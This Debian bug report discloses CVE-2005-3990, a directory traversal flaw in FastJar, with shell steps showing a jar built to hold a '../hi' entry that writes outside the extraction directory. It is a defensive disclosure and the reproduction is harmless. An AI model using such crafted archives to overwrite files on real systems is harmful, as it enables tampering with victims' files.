Package: fastjar Version: 1:4.1.0-4 Severity: normal Tags: security CVE-2005-3990: "Directory traversal vulnerability in FastJar 0.93 allows remote attackers to overwrite arbitrary files via a .jar file containing filenames with "../" sequences."
I can reproduce this with the following steps (modified from an earlier SUN jar vulnerability report [1]): $ mkdir /tmp/foo $ echo hi > /tmp/hi $ cd /tmp/foo $ fastjar cvf foo.jar ../hi adding: META-INF/ (in=0) (out=0) (stored 0%) adding: META-INF/MANIFEST.MF (in=56) (out=56) (stored 0%) adding: ../hi (in=3) (out=5) (deflated -66%) Total: ------ (in = 51) (out = 371) (deflated -627%) $ rm ../hi $ fastjar xvf foo.jar created: META-INF/ extracted: META-INF/MANIFEST.MF inflated: ../hi $ cat ../hi hi Please mention the CVE in your changelog. Thanks, Alec [1] http://www.securiteam.com/securitynews/5IP0C0AFGW.html -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/dash Kernel: Linux 2.6.16-alec-laptop Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Versions of packages fastjar depends on: ii libc6 2.3.6-9 GNU C Library: Shared libraries ii zlib1g 1:1.2.3-11 compression library - runtime fastjar recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
